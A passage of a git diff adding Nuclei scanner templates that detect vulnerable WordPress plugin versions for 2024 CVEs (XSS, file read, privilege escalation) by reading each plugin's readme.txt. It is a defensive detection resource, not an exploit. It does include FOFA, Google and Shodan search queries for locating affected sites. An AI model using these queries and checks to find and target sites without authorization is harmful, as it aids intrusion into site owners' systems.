not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5debe121-6373-4b56-8441-f0d4a5920089?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10690 + metadata: + fofa-query: "wp-content/plugins/shortcode-elementor/" + google-query: inurl:"/wp-content/plugins/shortcode-elementor/" + shodan-query: 'vuln:CVE-2024-10690' + tags: cve,wordpress,wp-plugin,shortcode-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shortcode-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10704.yaml b/poc/cve/CVE-2024-10704.yaml new file mode 100644 index 0000000000..b9684519d8 --- /dev/null +++ b/poc/cve/CVE-2024-10704.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10704-a70e8bbf9a1e090c995118fbf05ef043 + +info: + name: > + Photo Gallery by 10Web – Mobile-Friendly Image Gallery <= 1.8.30 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery Titles in all versions up to, and including, 1.8.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1bc2300-bd8d-4e4a-8ab5-a541f62133ca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10704 + metadata: + fofa-query: "wp-content/plugins/photo-gallery/" + google-query: inurl:"/wp-content/plugins/photo-gallery/" + shodan-query: 'vuln:CVE-2024-10704' + tags: cve,wordpress,wp-plugin,photo-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "photo-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.30') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10708.yaml b/poc/cve/CVE-2024-10708.yaml new file mode 100644 index 0000000000..dea31c85ef --- /dev/null +++ b/poc/cve/CVE-2024-10708.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10708-a94086c9c44731fdca495f410cfc1b1e + +info: + name: > + System Dashboard <= 2.8.14 - Authenticated (Admin+) Arbitrary File Read + author: topscoder + severity: low + description: > + The System Dashboard plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.8.14 via the 'sd_viewer' action. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69aa2287-3d26-43e2-a2d0-4985ed17d096?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-10708 + metadata: + fofa-query: "wp-content/plugins/system-dashboard/" + google-query: inurl:"/wp-content/plugins/system-dashboard/" + shodan-query: 'vuln:CVE-2024-10708' + tags: cve,wordpress,wp-plugin,system-dashboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/system-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "system-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10783.yaml b/poc/cve/CVE-2024-10783.yaml new file mode 100644 index 0000000000..85918875df --- /dev/null +++ b/poc/cve/CVE-2024-10783.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10783-194d14e49a97ce9ed7766354ddcc8c6e + +info: + name: > + MainWP Child <= 5.2 - Missing Authorization to Unauthenticated Privilege Escalation + author: topscoder + severity: high + description: > + The MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites plugin for WordPress is vulnerable to privilege escalation due to a missing authorization checks on the register_site function in all versions up to, and including, 5.2 when a site is left in an unconfigured state. This makes it possible for unauthenticated attackers to log in as an administrator on instances where MainWP Child is not yet connected to the MainWP Dashboard. IMPORTANT: this only affects sites who have MainWP Child installed and have not yet connected to the MainWP Dashboard, and do not have the unique security ID feature enabled. Sites already connected to the MainWP Dashboard plugin and do not have the unique security ID feature enabled, are NOT affected and not required to upgrade. Please note 5.2.1 contains a partial patch, though we consider 5.3 to be the complete patch. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9156e536-a58e-4d78-b136-af8a9613ee23?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-10783 + metadata: + fofa-query: "wp-content/plugins/mainwp-child/" + google-query: inurl:"/wp-content/plugins/mainwp-child/" + shodan-query: 'vuln:CVE-2024-10783' + tags: cve,wordpress,wp-plugin,mainwp-child,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mainwp-child" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10893.yaml b/poc/cve/CVE-2024-10893.yaml new file mode 100644 index 0000000000..713a219599 --- /dev/null +++ b/poc/cve/CVE-2024-10893.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10893-a8b2ddc814e2620ef1ea708f58ef3008 + +info: + name: > + WP Booking Calendar <= 10.6.4 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 10.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f6c74bcb-b41d-4a4f-97d5-b92a3bfc794d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10893 + metadata: + fofa-query: "wp-content/plugins/booking/" + google-query: inurl:"/wp-content/plugins/booking/" + shodan-query: 'vuln:CVE-2024-10893' + tags: cve,wordpress,wp-plugin,booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10896.yaml b/poc/cve/CVE-2024-10896.yaml new file mode 100644 index 0000000000..6b8ec460f0 --- /dev/null +++ b/poc/cve/CVE-2024-10896.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10896-b87b742b653c072456023acb4e76af1e + +info: + name: > + Logo Slider <= 4.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Logo Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the "Brand Name" field in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6cc17a6-994c-4ac4-8175-263add849b1b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10896 + metadata: + fofa-query: "wp-content/plugins/cb-logo-slider/" + google-query: inurl:"/wp-content/plugins/cb-logo-slider/" + shodan-query: 'vuln:CVE-2024-10896' + tags: cve,wordpress,wp-plugin,cb-logo-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cb-logo-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cb-logo-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10980.yaml b/poc/cve/CVE-2024-10980.yaml new file mode 100644 index 0000000000..ecbf888bd2 --- /dev/null +++ b/poc/cve/CVE-2024-10980.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10980-e93e9bf451e7535bca72e467980f5955 + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) <= 5.10.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Cookie Consent' + author: topscoder + severity: low + description: > + The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Cookie Consent block in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/71f78fef-50f6-49d5-94f6-6d0cf1b8f536?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10980 + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:CVE-2024-10980' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.10.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11012.yaml b/poc/cve/CVE-2024-11012.yaml new file mode 100644 index 0000000000..38f7e55c58 --- /dev/null +++ b/poc/cve/CVE-2024-11012.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11012-07fb523fa0ee4232af334e98e3c26772 + +info: + name: > + Notibar – Notification Bar for WordPress <= 2.1.4 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via njt_nofi_text + author: topscoder + severity: low + description: > + The The Notibar – Notification Bar for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via njt_nofi_text AJAX action in all versions up to, and including, 2.1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1766727d-ba54-4b46-b362-415c14be027d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-11012 + metadata: + fofa-query: "wp-content/plugins/notibar/" + google-query: inurl:"/wp-content/plugins/notibar/" + shodan-query: 'vuln:CVE-2024-11012' + tags: cve,wordpress,wp-plugin,notibar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/notibar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "notibar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml b/poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml new file mode 100644 index 0000000000..40163d028a --- /dev/null +++ b/poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11095-b0165142a699db32c27db406fb189dac + +info: + name: > + Visualmodo Elements <= 1.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Visualmodo Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11095 + metadata: + fofa-query: "wp-content/plugins/visualmodo-elements/" + google-query: inurl:"/wp-content/plugins/visualmodo-elements/" + shodan-query: 'vuln:CVE-2024-11095' + tags: cve,wordpress,wp-plugin,visualmodo-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visualmodo-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visualmodo-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11107.yaml b/poc/cve/CVE-2024-11107.yaml new file mode 100644 index 0000000000..9f2095a413 --- /dev/null +++ b/poc/cve/CVE-2024-11107.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11107-eedf99f3343eab66ce27c56f82118688 + +info: + name: > + System Dashboard <= 2.8.14 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The System Dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.8.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ed6c1c2-8fbd-4bcb-854a-492d1060364b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-11107 + metadata: + fofa-query: "wp-content/plugins/system-dashboard/" + google-query: inurl:"/wp-content/plugins/system-dashboard/" + shodan-query: 'vuln:CVE-2024-11107' + tags: cve,wordpress,wp-plugin,system-dashboard,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/system-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "system-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11140.yaml b/poc/cve/CVE-2024-11140.yaml new file mode 100644 index 0000000000..e33cf8a37d --- /dev/null +++ b/poc/cve/CVE-2024-11140.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11140-59c50b763fa3b85c4c06d48cf812f8e0 + +info: + name: > + Real WP Shop Lite Ajax eCommerce Shopping Cart <= 2.0.8 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Real WP Shop Lite Ajax eCommerce Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd75955-3c9e-4cac-b952-f705a2129707?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11140 + metadata: + fofa-query: "wp-content/plugins/real-wp-shop-lite/" + google-query: inurl:"/wp-content/plugins/real-wp-shop-lite/" + shodan-query: 'vuln:CVE-2024-11140' + tags: cve,wordpress,wp-plugin,real-wp-shop-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/real-wp-shop-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "real-wp-shop-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11183.yaml b/poc/cve/CVE-2024-11183.yaml new file mode 100644 index 0000000000..488a15e1b4 --- /dev/null +++ b/poc/cve/CVE-2024-11183.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11183-740e0e624799af0f29235cfe4c93224c + +info: + name: > + Simple Side Tab <= 2.1.14 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Simple Side Tab plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4555b16b-dd30-494b-ada9-33006cd729cf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11183 + metadata: + fofa-query: "wp-content/plugins/simple-side-tab/" + google-query: inurl:"/wp-content/plugins/simple-side-tab/" + shodan-query: 'vuln:CVE-2024-11183' + tags: cve,wordpress,wp-plugin,simple-side-tab,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-side-tab/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-side-tab" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11190.yaml b/poc/cve/CVE-2024-11190.yaml new file mode 100644 index 0000000000..6cf20762f6 --- /dev/null +++ b/poc/cve/CVE-2024-11190.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11190-815c4afdf39ca536261160cd80e26e43 + +info: + name: > + jwp-a11y <= 4.1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The jwp-a11y plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d0da23a-12e6-4e57-8413-dc86a62b1800?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11190 + metadata: + fofa-query: "wp-content/plugins/jwp-a11y/" + google-query: inurl:"/wp-content/plugins/jwp-a11y/" + shodan-query: 'vuln:CVE-2024-11190' + tags: cve,wordpress,wp-plugin,jwp-a11y,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jwp-a11y/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jwp-a11y" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11221.yaml b/poc/cve/CVE-2024-11221.yaml new file mode 100644 index 0000000000..17e313474a --- /dev/null +++ b/poc/cve/CVE-2024-11221.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11221-fd998e8034a09be96ea1e90e75cb53d4 + +info: + name: > + Full Screen (Page) Background Image Slideshow <= 1.1 Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Full Screen (Page) Background Image Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf2ffdb1-fe10-475b-9c05-553a95d7b3bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-11221 + metadata: + fofa-query: "wp-content/plugins/full-screen-page-background-image-slideshow/" + google-query: inurl:"/wp-content/plugins/full-screen-page-background-image-slideshow/" + shodan-query: 'vuln:CVE-2024-11221' + tags: cve,wordpress,wp-plugin,full-screen-page-background-image-slideshow,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/full-screen-page-background-image-slideshow/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "full-screen-page-background-image-slideshow" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11275.yaml b/poc/cve/CVE-2024-11275.yaml new file mode 100644 index 0000000000..99188a12f0 --- /dev/null +++ b/poc/cve/CVE-2024-11275.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11275-206acacc954728d70b76a3dfcd2a713b + +info: + name: > + WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin <= 1.0.27 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Deletion + author: topscoder + severity: low + description: > + The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the /wp-json/timetics/v1/customers/ REST API endpoint in all versions up to, and including, 1.0.27. This makes it possible for authenticated attackers, with Timetics Customer access and above, to delete arbitrary users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d68e250e-d850-4100-81db-3e3c48a3a4a1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-11275 + metadata: + fofa-query: "wp-content/plugins/timetics/" + google-query: inurl:"/wp-content/plugins/timetics/" + shodan-query: 'vuln:CVE-2024-11275' + tags: cve,wordpress,wp-plugin,timetics,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/timetics/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "timetics" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.27') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml b/poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml new file mode 100644 index 0000000000..11f6183cbc --- /dev/null +++ b/poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93 + +info: + name: > + Smoove connector for Elementor forms <= 4.1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11367 + metadata: + fofa-query: "wp-content/plugins/smoove-elementor/" + google-query: inurl:"/wp-content/plugins/smoove-elementor/" + shodan-query: 'vuln:CVE-2024-11367' + tags: cve,wordpress,wp-plugin,smoove-elementor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smoove-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smoove-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11372.yaml b/poc/cve/CVE-2024-11372.yaml new file mode 100644 index 0000000000..4850f49445 --- /dev/null +++ b/poc/cve/CVE-2024-11372.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11372-19add4c9d86c1440f92c818767e272d4 + +info: + name: > + Connexion Logs <= 